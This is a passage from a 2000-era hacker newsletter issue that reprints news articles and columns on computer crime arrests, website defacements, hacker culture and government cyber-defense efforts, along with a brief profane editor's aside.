a request for comment. ISN is sponsored by Security-Focus.COM @HWA 223.0 ISN:Police to step up fight against e-crime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Police to step up fight against e-crime Source: AAP | Published: Friday March 17, 3:38 PM Police are set to recruit computer boffins in a bid to boost the fight against so-called e-crime. The potential to commit crimes using computers and other information technology was one of the greatest problems ever to face law enforcement, Australian Federal Police Commissioner Mick Palmer said today. Speaking at the end of a week-long conference of police commissioners from Australia, New Zealand, Fiji and Papua New Guinea, Commissioner Palmer said a staggering 900 million people would be using the Internet by the end of this year. 'People who abuse these technologies have the capacity to commit offences on a global basis, with complete anonymity, with speed and on a scale not previously encountered,' Commissioner Palmer told journalists. Credit card fraud, electronic vandalism, terrorism, electronic money laundering and tax evasion are some examples of electronic crime. 'The capacity of properly organised, electronic based crime to undermine the financial stability of small and medium sized countries is very real,' Commissioner Palmer said. A major problem for police is how to attract personnel with enough technical expertise to fight this new crime. Commissioner Palmer said already police recruitment and selection was becoming more flexible. 'Clearly some of the technical skills that we are going to need ... come at a very high cost,' he said. 'People ... in that industry are earning a lot of money and that makes the partnerships with business and the wider business community very important.' Police will be looking to exchange staff with private industry to gain the skills necessary, probably on short term, project based arrangements. Commissioner Palmer said discussions and negotiations had already begun on this issue and Commonwealth Bank CEO David Murray addressed the commissioners. 'We will be recruiting people from the coalface for short periods of time, we are going to be sharing resources between ourselves and the wider partnership both in the private and public sense.' The commissioners agreed to establish an Electronic Crime Steering Committee to evaluate Australasia's capacity to fight electronic crime. It will develop an Australasian Law Enforcement Electronic Crime Strategy by the end of June. @HWA 223.0 W00T:You already read section 223.0 you dumb ass. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Fucking huge issue this isn't it? wtf am I nuts!?! noone even reads this thing Yeah its a hidden track. wow....we're possibly going to be affiliated with EUA coz like they're cool and shiznitz and besides _jeezus_ told me to. Also the IBT people may be dragging my sorry ass into their fold, but we'll see... I have some issues there. Lessee, oh yeah i'm in b0f now, why? vanity of course. besides I passed the brainbench lame internet security cert exam (lol/phear). Military box has been probing my windows machine (one I surf and mail from) ds-1.chamb.disa.mil, I couldn't connect back it gave me a net unreach error so I guess its firewalled. If you're reading this, you guys should just join #EFnet IRC and /join #hwa.hax0r.news and chat. Don't probe my fucking box or i'll bite back. seen? you're not even my country's military, keep yer nose out and stop fucking strongarming the milmail people. assholes. I know who you are. To the guy that mailed me trying to get on the mailing list with "adept" in your name... first you mailed a trap email address, where did you find that one? second yeah i'm the same guy thats in #feed-the-goats what of it? who are you? :-)) End of hidden track. Cruci- (C*:.) 224.0 ISN:Developers blasted on security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: William Knowles http://www.wired.com/news/politics/0,1283,34865,00.html WASHINGTON -- A top cyber security expert blasted software developers Thursday for marketing flawed products that he said boosted the Internet's vulnerability to hacker attacks. "There is little evidence of improvement in the security features of most products," said Rich Pethia, director of a federally funded computer emergency response operation at Carnegie Mellon University in Pittsburgh. "Developers are not devoting sufficient effort to apply lessons learned about the sources of vulnerabilities." Pethia made his comments to a congressional panel looking into the so-called denial-of-service attacks that disrupted access to popular Web sites last month for a few hours at a time. He said his organization, which responded to more than 8,000 computer security incidents last year, up from 132 in its first full year of operation 10 years ago, had found the same types of security defects in newer versions of products as in earlier ones. "Technology evolves so rapidly that vendors concentrate on time to market, often minimizing that time by placing a low priority on security features," he said in a statement to a subcommittee of the House Committee on Government Reform. The alleged lack of urgency in plugging such cracks is unlikely to change until customers demand that products that are more secure, Pethia said. Pethia did not criticize any companies by name in his prepared statement to the panel. ISN is sponsored by Security-Focus.COM @HWA 225.0 ISN:"Islands in the clickstream, in defense of hacking" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: richard@thiemeworks.com The following article was published in the Village Voice, February 16 - 22, 2000 and the LA Weekly under the title "Hacking the Future." Islands in the Clickstream: In Defense of Hacking Let's get our definitions straight. Last week's attacks on dozens of Web sites were not the work of hackers. They were the work of script kiddies, and the difference is everything. Script kiddies download ready-made tools and use them to damage the network. Script kiddies criminally distort the essential ethos of hacking, which is to pass through the network without a trace. Hackers read the unknown, sense the contours of the codes that make tomorrow's booms and busts. It's no wonder that last week hackers everywhere cringed when the media confused them with script kiddies. Not less than 10 years ago, the word hacker conjured a dedicated geek, hunched over a glowing terminal, working late into the night to solve an intractable dilemma. Now hacker means something akin to cybercriminal. The semantic shift is regrettable, not only because the distortion inhibits clarity, but because it buries a piece of history we'd be wise to keep fresh: It was hackers who cobbled together the Internet. Hacking is a quest for knowledge. You can see the essence of the activity in meetings at security firms like Secure Computing, where hackers are a key part of the professional services team. With clients in the Fortune 500 and three-letter government agencies, like DOD and NSA, the stakes are high, and when the firm faces a perplexing problem, brainstorming sessions go late into the night. Ideas fly from one person to another like pinballs off flippers, as the group mind turns over and examines the puzzle from all sides. The concept of a "group mind" flows from the structure of the Internet itself, parallel processor harnessed to parallel processor to achieve a single goal. It's no coincidence that information technology professionals often think in a style similar to the way computers calculate. The network taught them how to reason digitally; it imprinted itself on their minds just as they imprinted their minds on it. Is it any wonder, then, that hackers are the leaders of the new millennium? By leader I mean someone who forges ahead and names the emergent realities of the dim future. Consider Tim Berners-Lee, who designed the first Web protocols and wrote the first browser code. Berners-Lee was a hacker. Or consider Richard Stallman, the evangelist of Open Source software. Stallman is an extraordinary hacker. I recently consulted with a major mutual fund, and after the meeting I traded war stories with its head of IT. He fondly recalled the old days of hacking Unix systems. That this former "delinquent" now runs a system executing billion-dollar transactions is not shocking. Most of the bright people in the IT business learned how to hack by-what else?-hacking. Let's go back to Open Source for a moment. It's now the conventional wisdom that the Linux operating system and GNU Project are miracles of modern computing, which may one day triumph over the clunky software produced by the Microsoft-Apple cartel. Stallman launched the GNU Project by asking hackers to volunteer their services. Of course, they did. Likewise, Linux was founded on the belief that complex systems must be open, evolving, and free in order to reach their ull potential. In other words, they must be hackable and they must be hacked. Continuously. Now comes the FBI and President Clinton with criminal sanctions for these script kiddies. It's right and just to keep the peace, but let's remember that in the Internet's embryonic stage, hacking, far from being criminal, was encouraged. When computers were first networked through telephone lines and slow modems, bulletin boards emerged as crossroads where cybertravelers could leave messages and valuable information about how the phone lines intersected with microprocessors. By these postings, the network formed a symbiotic relationship with its users, and through the give and take of countless exchanges between hackers, the network bootstrapped itself to a higher level of complexity. As Tom Jackiewicz, who helps administer upt.org, an outgrowth of the hackers' favorite, the UPT Bulletin Board, recalls, "In the old days of a decade ago, no kid could afford a Solaris workstation. The only machines available were online. You could learn only by roaming the network." Today the stakes are higher, security tighter, but the basic modalities of hacking and its relationship to innovation remain. The challenge du jour is the gauntlet thrown down by Microsoft, which claims that Windows NT, the operating system of many businesses, is secure. What a claim! For a baseball fan it would be like hearing the Yankees brag that they could play an entire season without losing a single game. Hackers love to find flaws in Windows NT. For them, the payoff is the power rush of the thunk! when the stone hits Goliath in the forehead. One of the sharpest stones to leave a hacker's sling is a program called Back Orifice 2000. Developed by a group called Cult of the Dead Cow, the program can be loaded stealthily on a Windows network, giving a remote user control over the network. Why develop such a weapon? In the current environment of ubiquitous distributed computing-that is, networks and nodes everywhere-the hackers argue that no operating system protects against stealthy executables like Back Orifice. So the program is a form of shock therapy. It jerks Microsoft into action, stirring an indolent industry into making the Internet more secure. The upgrades that come as a result benefit every Windows user. As a culture we are just beginning to recognize this dynamic. One of the first hacker groups to benefit from our grudging acceptance of the craft is LOpht, which crossed over from the computing underground to the mainstream after finding flaws in Windows NT. Their transition has been so successful that when Congress conducted an investigation into Internet security it asked two LOpht members, Mudge and Weld Pond, to come to Washington for a briefing. Now LOpht has teamed up with former Compaq Computer executives to form @Stake, a security firm that has the media and Wall Street swooning. So when is a hacker not a felon? When he receives $10 million in venture capital? When Congress invites him to a hearing? When we lump all hackers into a criminal class we are liable to forget their essential role as architects of the information age. Edward O. Wilson said that scientists are characterized by a passion for knowledge, obsession, and daring. Hackers share that passion, the hunter-gatherer gene for restless wandering, wondering what's beyond the next hill. They hack because it's fun, because it's a challenge, and because the activity shapes their identity. Their strengths-love of risk, toleration of ambiguity, and ability to sift meaning from disparate sources-power the very network we all rush to join. ********************************************************************** Islands in the Clickstream is an intermittent column written by Richard Thieme exploring social and cultural dimensions of computer technology and the ultimate concerns of our lives. Comments are welcome. Feel free to pass along columns for personal use, retaining this signature file. If interested in (1) publishing columns online or in print, (2) giving a free subscription as a gift, or (3) distributing Islands to employees or over a network, email for details. To subscribe to Islands in the Clickstream, send email to rthieme@thiemeworks.com with the words "subscribe islands" in the body of the message. To unsubscribe, email with "unsubscribe islands" in the body of the message. Richard Thieme is a professional speaker, consultant, and writer focused on the impact of computer technology on individuals and organizations - the human dimensions of technology and work - and "life on the edge." Islands in the Clickstream (c) Richard Thieme, 2000. All rights reserved. ThiemeWorks on the Web: http://www.thiemeworks.com and http://www.richardthieme.com ThiemeWorks P. O. Box 170737 Milwaukee WI 53217-8061 414.351.2321 ********************************************************************* ISN is sponsored by Security-Focus.COM @HWA 226.0 ISN:Man angry at employer swallows own head. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.sjmercury.com/breaking/docs/073358.htm NEW YORK (AP) [03.15.2000] - A database engineer angry at his employer was arrested on charges of using codes to disable computers in a three-day cyber attack on the company, authorities said Wednesday. Abdelkader Smires, 31, was arrested Tuesday and charged with intentionally causing damage through the unauthorized use of a computer. Computers at Internet Trading Technologies crashed for several hours over the three-day period beginning March 9. The attacks were traced to a computer at Queens College and authorities determined that Smires, who had once taught computer science there, had been using that computer, according to a criminal complaint. The company processes trades electronically for members of the National Association of Securities Dealers. The alleged attacks began after Smires and another engineer -- who was not named -- refused to help consultants and other workers learn the company's new operating system without more money, job security and equity, authorities said. On March 8, the company offered Smires a $70,000 raise, $50,000 in stock options and a one-year contract, but Smires turned them down, authorities said. The charge is punishable by up to five years in prison. Smires was in jail without bail pending a hearing Friday in federal court. He was to be assigned a public defender. Calls to the public defender's office were not immediately returned Wednesday. *-------------------------------------------------* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *-------------------------------------------------* ISN is sponsored by Security-Focus.COM sniff. @HWA 227.0 ISN:Nasa division battles the hack from ipanema. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.newsbytes.com/pubNews/00/145708.html By Robert MacMillan, Newsbytes WASHINGTON, DC, U.S.A., 15 Mar 2000, 1:15 PM CST From Antonio Carlos Jobim to the samba, the US generally has welcomed some of the cooler cultural exports from Brazil, but the latest one - a series of hack attacks on NASA's Jet Propulsion Laboratory at CalTech - has the agency bossa nova-ing its way toward beefing up its security measures. JPL Spokesman Frank O'Donnell confirmed for Newsbytes an MSNBC report that the agency has shut down access to queries emanating from Brazil until the agency's security team makes some necessary improvements to its network. O'Donnell said that the Brazil shutout was not a "blacklist" attempt, as earlier reports indicated. "There was a number of recent attacks on JPL hosts originating from various sites in Brazil, and as a temporary move while our computer security people work, we're blocking network access to JPL from Brazil," O'Donnell said. "But this is a temporary thing." He said normal service to South America's largest nation would return "in a matter of days at most." He added that he is "not aware of any (security) compromises per se in these attacks." Highly secure data at JPL generally is not stored on hosts that are connected to the Internet, O'Donnell also said, but added that he could "not go into a great deal of detail" on what kind of information was sought. MSNBC reported the Brazil problem after a network analyst at the Bank of Brazil in Brasilia reported that he could not access the JPL site. The service also reported that a CERT official at its headquarters in Pittsburgh, Pa., said that blocking access to an entire network or country is reasonably common, though the official said that spoofing attacks - when the address of the attacking e-mail in a denial of service attack is falsified - blocking against a particular domain or country code becomes largely ineffective. O'Donnell said that CERT and the JPL have been working jointly on security issues. *-------------------------------------------------* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *-------------------------------------------------* ISN is sponsored by Security-Focus.COM @HWA 228.0 ISN:Toys'R'Us ~~~~~~~~~~~~~ http://www.washingtonpost.com/cgi-bin/gx.cgi/AppLogic+FTContentServer?pagename=wpni/print&articleid=A52710-2000Mar10 Toys 'R' U.S. By William M. Arkin Special to washingtonpost.com Monday , March 13, 2000 The Navy's announcement that it is arming 2,000 ship-based officers with Palm V computers would seem, at first glance, to be a sound business decision, and proof that the Pentagon can indeed buy "off the shelf" products to the benefit of the taxpayer. The purchase is touted as the largest government buy ever of hand-held devices. But is it an investment in productivity, or a faddish move that has no place in the military arena? "It's one of the neatest things I've ever seen," Lt. Jeff Keenan told the Associated Press. Keenan is a combat systems officer aboard the Norfolk-based destroyer USS Laboon. "I used to be one of those people who carried around a big date book all the time, and I'd misplace it plenty of times, particularly when you'd put it down to climb a ladder," Keenan said. Don't burn your notebook just yet Jeff. Though his Palm V packs the equivalent of message center, walkie-talkie and clipboard, you can't get it wet. Plug and Play Laptop computers, pagers, and hand-held devices are sprouting like weeds in the military. While many are truly purchases direct from civilian vendors, others are made to order for the wear and tear of the battlefield: waterproof, mud-proof, shock-resistant, anti-glare, and electromagnetic pulse surviving. These computers--Mini-Python, the M-30, Condor, FALCon, and Warlord Notebook--could almost be weapons given their ingenious names. Better able to survive the rigors of combat, they are much more expensive than both the Palm V or any high-end commercial laptop. "A Palm Pilot is five ounces of dead weight in a firefight," says one military technology expert. For the battlefield, the Army's Force XXI experiment is testing dozens of laptops and helmet and body-mounted computers (called "appliques") to link soldiers, officers, and equipment. The Navy is not without its own sea-going technology. One company has produced a $30,000 laptop approved for use on the decks of ships because it can sustain sea spray, intense sunlight and the extreme electromagnetic interference from shipboard radar. Is this indeed "a battlefield bristling with leap-ahead technology," as former Secretary of Defense William Perry described the Army's digitization effort a few years back? Or is it the cyber equivalent of the $600 toilet seat? Solutions and Problems "Adolescence," is how Martin Libicki, an information technology expert at the Rand Corporation calls the current state of electronic offerings. Libicki sees a technology harvest that will eventually reap true military benefits, but for now, he says: "If you are going to be an adult, you've got to go through it, zits and all." Libicki has been worrying about ways to ensure that if soldiers are ever captured with their gizmos, systems will not be compromised. "I'm worried about the guy who finds himself on the wrong side of an AK-47," he says. If the enemy were to gain access to the American tactical picture through a hand-held device or laptop, they could learn gaps in intelligence and "blue" (i.e., U.S. military) vulnerabilities. Thus Libicki has developed some ideas to ensure network security for the inherently vulnerable battlefield systems. There is his "GPS lock-out" idea, a $200 module could be added to hand-held devices to incorporate a global positioning satellite system. If the device is reported behind enemy lines, the module assumes it has been captured and shuts down the device down awaiting resynchronization. Then there is "dual password," which would allow a prisoner of war to key in a fake password to unlock his laptop for enemy interrogators. But the back-up password would bring up false data on the screen that would seem plausible. It would also send a signal to the mother ship that the unit has been lost. Libicki has even conceived of an artificial intelligence program that could monitor keystrokes and thus stress to determine that a machine is still functioning under normal circumstances. Adding without a Calculator Though Libicki is palpably excited by his engineering challenges, he also asks some pointed questions. Does any soldier who has the potential to be captured really need a laptop? In a world where you can see the enemy from far away, do soldiers even need to close in on the enemy? Are we just building the systems for "a high-tech Gettysburg," Libicki asks? "The only time you want to get in and amongst the enemy is when there is no choice," he says. Laptop computers that can survive a nuclear war? Notebooks that can operate on the front lines? Hand-held devices on enclosed ships and submarines? Obviously there is potential for excess here. Beyond the question of waste though, there is the matter of practicality. Proliferation of personal devices ensure better communication, record keeping, and access to information. But when systems fail, will military people still know the skills to use the old grease pencil? I for one have been writing with a word processor for almost 20 years, and frankly I've lost my ability to write anything beyond a grocery list in long hand. Isn't war too important to be left to the laptop? Contact William M. Arkin at william_arkin@washingtonpost.com *-------------------------------------------------* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *-------------------------------------------------* ISN is sponsored by Security-Focus.COM @HWA "Why is a mouse when it spins?" - Dr Who 229.0 ISN:Computer expert accused of hacking ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: darek.milewski@pl.pwcglobal.com FBI Computer Expert Accused of Hacking Henry K. Lee, Chronicle Staff Writer Friday, March 24, 2000 ©2000 San Francisco Chronicle URL: http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/03/2 4/MN57003.DTL Max Ray Butler seemed to be at the top of his game. For two years, the computer expert was a confidential source for an elite FBI computer crime squad, helping to ferret out scofflaws on the Internet. Butler, also known as Max Vision, was also a self-described ``ethical hacker'' from the Silicon Valley who boasted that he could test the security of any computer system by penetrating it. But Butler's cyber activity went too far, federal authorities say. Butler, 27, of Berkeley appeared in federal court in San Jose yesterday on a 15-count federal indictment charging him with hacking into computers used by the University of California at Berkeley, national laboratories, federal departments, air force bases across the country and a NASA flight center. Butler posted $50,000 cash bail yesterday after U.S. Magistrate Judge Patricia Turnbull ordered him not to use computers except for work. Butler and his attorney, Jennifer Granick of San Francisco, could not be reached for comment. The indictment, handed down March 15, said Butler caused ``reckless damage'' as a result of intrusions in May 1998. Butler was also charged with possession, with intent to defraud, of 477 passwords belonging to customers of a Santa Clara- based Internet service provider. The case underscores the potential risks involved when law-enforcement agencies use confidential informants with access to sensitive information. ``Sources are often very close to criminal activity, and sometimes they cross the line,'' said Special Agent George Grotz, an FBI spokesman in San Francisco. Grotz declined to say how Butler became an FBI informant and whether he was a federal source at the time of the alleged crimes. Grotz said Butler is no longer associated with the agency. Friends of the suspect told the Associated Press that Butler was caught possibly violating the law several years ago and began working with the FBI to avoid charges. Seth Alves, 27, told the news agency that Butler was unfairly targeted after refusing to comply with an FBI request. A 22-month investigation by the FBI and military investigators ended Tuesday morning when federal agents converged on a home on Dwight Way near the UC Berkeley campus, where Butler lives with his his 23-year-old wife, Kimi Winters. No one answered the door. Butler turned himself in to the FBI in Oakland later that day. Butler grew up in Idaho and lived with his family in Washington, where authorities said he has a 1997 misdemeanor conviction for attempted trafficking of stolen property. He developed a proficiency with computers, eventually attracting the attention of the FBI's Computer Crime Squad, which used him as a confidential informant. An FBI search warrant affidavit said Butler was ``well known'' to squad members and ``has provided useful and timely information on computer crimes in the past.'' In 1997, Butler started a company known as Max Vision in Mountain View, specializing in ``penetration testing'' and ``ethical hacking'' procedures in which he would simulate for clients how a hacker would penetrate their computer systems, according to the company Web site. ``Our client penetration rate is currently 100 percent,'' the site said, with recent clients including a large consortium of telecommunications companies, a major motion picture company and an e-commerce online auction service. By 1998, Butler was living with Winters in a one-story San Jose apartment, where the couple started up their own Web-design company, Kimi Networks, records show. Reached by telephone yesterday, Winters hung up on a Chronicle reporter. It was also from that apartment, according to the FBI, that Butler hacked into computers by using a computer software vulnerability known as a buffer overflow, which sends commands into a system that ordinarily would not be allowed. Butler also allegedly invaded computers used by the Lawrence Berkeley National Laboratory. Vern Paxson, a computer scientist at the lab, noticed an online intruder conducting unauthorized scans of laboratory and UC Berkeley computers in May 1998 and used a monitoring device that later helped identify the source of the intrusions. Paxson said yesterday that Butler's arrest was ``somewhat ironic'' but ``not totally surprising.'' Paxson said a person later identified as Butler even sent him an apologetic e-mail a day after the computer intrusions. Butler also somehow obtained a confidential incident report Paxton had filed about the invasions, Paxson said. ISN is sponsored by Security-Focus.COM @HWA 230.0 ISN:Disney and Miramax Sued for 'Hacking' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: Nelson Murilo [http://biz.yahoo.com/bw/000329/ca_bartko__1.html] Wednesday March 29, 8:09 am Eastern Time Company Press Release Disney and Miramax Sued for 'Hacking' Parts of 'The Fugitive Game' Allegedly Stolen For New Movie SAN FRANCISCO--(BUSINESS WIRE)--March 29, 2000--The Walt Disney Company and its Miramax division have made a computer hacker movie that ``hacked'' the author's book without paying or giving credit to the writer, according to a lawsuit filed yesterday by Bartko, Zankel, Tarrant & Miller, a law firm representing best-selling author Jonathan Littman. Littman's suit alleges that the Disney/Miramax/Dimension Films production of the movie Takedown, which premiered earlier this month in 29 theatres in Paris, France, was based in large part on lifted segments of Littman's book, The Fugitive Game. Littman's book, published in 1996, is based on the celebrated capture of computer hacker Kevin Mitnick, who was billed at the time as the world's most notorious and dangerous ``cyberterrorist.'' ``Jonathan Littman carefully researched the reality of the computer hacker underworld,'' said his lawyer Bill Edlund. ``His book articulated and supported his view that Kevin Mitnick was not the premeditated, greedy and destructive criminal portrayed by some of the media. Readers and critics received Littman's The Fugitive Game as a more in-depth presentation and entertaining expose of the flawed Mitnick prosecution than the overblown, self-interested media hype.'' The Fugitive Game shows Mitnick to be not a terrorist, but a computer hacker, in part a misguided victim of a government entrapment effort that used a sleazy informant to lure Mitnick into hacking. A key element of Littman's book is his examination of the media hype spurred in New York Times articles by reporter John Markoff about the Mitnick story. Littman also questions Markoff's presentation of Tsutomu Shimomura, a computer security specialist who used hacking techniques similar to Mitnick's to trace Mitnick to his hideout in North Carolina. Shimomura and Markoff wrote their version of these events in their book Takedown, released at the same time as Littman's book. The book is based on the seven-week pursuit of Mitnick by Shimomura that led to Mitnick's arrest in February of 1995. The Disney organization purchased the book and movie rights to Takedown and have now released their movie version, hiring a cast that included lead actor Skeet Ulrich and screenwriters led by John Danza. ``The screenwriter could not shape the story told in the book Takedown into a workable script,'' said Edlund. ``Once the movie project began to flounder, Danza and other screenwriters lifted most of the first part of Littman's The Fugitive Game for the storyline and start of the movie Takedown. Littman's lawsuit is backed by e-mails allegedly sent by Danza. In the e-mails, the screenwriter admits that it was 'unfortunate' that Disney did not option the rights to the book The Fugitive Game to make the movie Takedown. Danza goes on to describe his desire to use Littman's insider information and parts of Littman's book in order to try and salvage the movie project.'' The complaint presents a detailed comparison between Littman's book and the final shooting script for the movie Takedown, allegedly illustrating repeated and compelling similarities between the two. According to the allegations, the film Takedown and The Fugitive Game both open with a scene in a strip club frequented by a government informer who reveals to Mitnick information about ``SAS'' -- a secret Pacific Bell phone-tapping system that Mitnick subsequently breaks into and uses. Littman's lawsuit also contends that various themes and interpretations from his book that are absent from the book Takedown appear in the movie version of Takedown, including the government informer and entrapment of Mitnick, and the pressure on the government to capture Mitnick created by exaggerated media hype. Littman seeks to prevent Disney, Miramax and the other defendants from continuing to violate his copyrights by distributing the movie and to recover his damages and the wrongful profits that defendants obtained from the alleged theft of his work. Littman's lawyers say that the Disney-Miramax plagiarism tainted Littman's work by patching it into their motion picture. Because of this, he is also asking for damages that he claims resulted from opportunities he lost, including the opportunity for involvement with other movie projects based on The Fugitive Game. ISN is sponsored by Security-Focus.COM @HWA 231.0 ISN:Hacker posts own version of Gore's speech online ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This might be the most pheared 'Dilbert Cubicle Gang' we've been hearing rumours about lately .. watch for them - Ed http://www.jsonline.com/news/gen/mar00/1muhack29032800.asp By Stanley A. Miller II of the Journal Sentinel staff Last Updated: March 28, 2000 A hacker cracked into Marquette University's Web site early Tuesday, replacing the school's home page with a false front concerning Al Gore's speech at the college. The fake Web page posted false quotes about the vice president's address to the university Monday, claiming among other things that Gore said he plans to "rid this country of anyone who might question my motives, starting with deporting all Christians." John Hopkins, vice president for communications at Marquette University, said the school's information technology staff detected attempts to break into the network Monday morning and disconnected the college's link to the Internet so they could deal with the attacks. The school's link was restored around 5 p.m. Monday, and sometime between then and 1 a.m. Tuesday, a hacker broke in and replaced the school's Web page. Marquette's Web page was back to normal by around 1:30 a.m. Tuesday. "Our IT people are working through this and figuring out what happened," Hopkins said. The fake home page "was up for a relatively limited period of time, and that time was early in the morning. I don't think very many people saw it." Brian Manganello, an FBI special agent, said Marquette officials contacted them about the attack, but he declined to comment further. "We were informed that external attempts were made to compromise their computer networks," he said. "We're investigating the matter." John Gapinski, chief operating officer for Sun Tzu Security Ltd., a technology security company in Milwaukee, said that if the hacker got administrative access to the school's network servers, the college could develop all kinds of problems. The computer intruder may have stashed viruses or other malignant programs for later use on the school's computers, he said. "It would be prudent for them to audit their systems," he said. "You can't necessarily trust anything now." *-------------------------------------------------* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *-------------------------------------------------* ISN is sponsored by Security-Focus.COM @HWA 232.0 ISN:Bennett leads cyber defense ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ MY mother makes me wear these clothes. http://deseretnews.com/dn/view/0,1249,155013410,00.html? Utah senator fears U.S. will be attacked by computer hackers By Lee Davidson Deseret News Washington correspondent WASHINGTON Sen. Bob Bennett was appointed Monday to head a new Senate group designed to be a central clearing house for information on how to combat cyber-attacks. That comes after Bennett, R-Utah, said last week that he fears the next world war will not be fought with tanks and missiles, but by enemy hackers attacking the nation's computers to crash everything from the nation's utilities to its banking. Bennett also headed a similar committee that oversaw combating the Year 2000 computer glitch. His new Critical Infrastructure Protection Working Group emerges largely to address threats warned about by the earlier Y2K committee. Senate Majority Leader Trent Lott, R-Miss., said he formed the group and named Bennett to head it because "recent hacker attacks on major e-commerce and government Web sites demonstrate the importance of information security." Bennett said, "The interconnectivity and advanced capabilities of U.S. computer systems makes the United States more vulnerable to cyber-attacks than any other nation in the world. Such attacks could bring the U.S. economy to its knees." He added, "The CIP Working Group will serve as a central repository for this information and coordinate efforts to increase national awareness." Also appointed to the group were senators who chair regular committees that share some jurisdiction over the problem including Judiciary Committee Chairman Orrin Hatch, R-Utah. Others include senators who chair the Banking, Commerce, Foreign Relations, Commerce, Energy, Intelligence, Appropriations, Environmental, Governmental Affairs and Armed Services committees, plus a few additional senators. Just last week, Bennett told a symposium on cyber-security that lessons learned from fighting Y2K problems showed him how vulnerable America is to an attack via computer hacking. "The most vulnerable country in the world to this kind of attack is the United States of America because we have the most advanced capabilities," he said. Bennett added that because computer systems are now so interconnected, "a cyber-attack one place can bring down services in all the other places in the world." He said the major threat would be if "a possible major state . . . would develop the resources for a concentrated, continuing and sophisticated attack over time" via computer hacking. Bennett added, "In my opinion, the next war will be this target rather than the traditional" weapons of war. *-------------------------------------------------* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *-------------------------------------------------* ISN is sponsored by Security-Focus.COM @HWA 233.0 ISN:Hackers rue blurred line between curiosity, vandalism ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I didn't write it folks, dictionaries are cheap these days aren't they? - Ed http://www.techserver.com/noframes/story/0,2294,500185952-500248285-501250243-0,00.html By HARRY BRUINIUS, The Christian Science Monitor NEW YORK (March 28, 2000 2:20 a.m. EST http://www.nandotimes.com) - When Simple Nomad was younger, one of his favorite pastimes was worming his way into phone companies' computer systems. That was more than 10 years ago, before words like "Internet" and "hacker" were key words in the cultural lexicon - and before it was against the law. "I liked to take things apart and see how they worked, he says. "In that way, I'm considered 'old school.'" Getting around a computer system's security and exploring its technological nuance is part of the thrill of the pseudonymous world of the hacker underground, a relatively young cyberspace culture where computer programmers like Simple Nomad are driven to demonstrate their own technological skills. For many, the term "hacker" conjures up images of a precocious troublemaker smirking as he toys with the technologically challenged. Indeed, sometimes what the hacker underground sees as exploring, companies call trespassing. But hackers see a difference between their love of exploration and computer showmanship and recent attempts to shut down Web sites and steal credit-card information. They see themselves as pioneers, ones who are helping computer culture and science evolve - as opposed to the thieving (and amateur) tactics of those they derisively call "crackers." But as the Internet evolves into a giant superstore, the lines between black and white are blurring further. The hacking underground has a libertarian ethos that places a high value on the free flow of information. As a result, hackers often post techniques that can be used to crack system security. They argue that unauthorized hacks into systems are the only way allow security techniques - as well as technology - to fully evolve. "I'll be the first to admit there are a lot of gray areas," says Simple Nomad, who runs Nomad Mobile Research Centre, a Web site that provides information on the security flaws in computer systems. "I've written tools that I know can be used for people to test their system, but I also know someone can turn around and use the same tools to break into a system." In the mid 1990s, as many in the Internet industry began clamoring for ways to protect against these intrusions, Congress passed legislation that made hacking a crime. Last week, Max Vision, the hacking alias of Max Ray Butler, was held on $100,000 bail after being indicted for breaking into government systems including NASA and the Department of Defense. The hacker community, however, bristles at being lumped with acts like last month's "denial of service" attacks against Internet behemoths like Yahoo! and eBay, attacks that lacked the technological sophistication they value. Many have tried to distinguish hackers from "black hats" or "crackers," who crack into systems to steal credit card information or do some kind of damage. "A lot of the underground isn't looking at this as a major hack, or even as a genuine act of hacking," says Space Rogue, editor of Hacker News Network and a computer scientist for security consortium @stake.com. A. Anonymous, a former "black hat" hacker who wrote the best-selling book "Maximum Security," was one of the first to give detailed information on how to crack a system's security. "All these other security books, not one of them taught you how to break into anything," he says. "But because there are standard things you must do to secure your system, you first need to know how the attacks work." Some of the roots of hacking come out of the "phone phreaking" of the 1970s. According to the Hackers' Hall of Fame, the hacker Cap'n Crunch became a legend when he figured out how to reproduce the tone that authorizes long-distance service with a toy whistle from a cereal box. Later, many people - mostly kids - manipulated pay-phone wires with a paper clip to get "free" long-distance. As networks connected by phone wires began to evolve, so did the various ways to furtively plug into them. As young hackers explored the source code of systems, they began to think of ways to do it better. The result was a highly competitive community where, like playground basketball, a hacking "star" performs exploits that could become legendary. "When something is posted, immediately that motivates some people to want to do something better," says A. Anonymous. "As a result, ideas are being exposed to an evolution at an extremely rapid pace." Though Simple Nomad says he no longer breaks into systems, he notes that his Web site is listed as criminal on most Web-blocking software. "Which is unfortunate," he says, "because 9 out of 10 e-mails I get is from a system administrator saying 'Thank you, I used the stuff on your site to take care of my system.'" More and more, Internet security companies are using the techniques of the hacker underground to make systems more secure. And many of the old phone phreakers and black-hat crackers are being hired. "You stick with it long enough," says A. Anonymous, "and you shed the purple hair and put on a suit and tie." 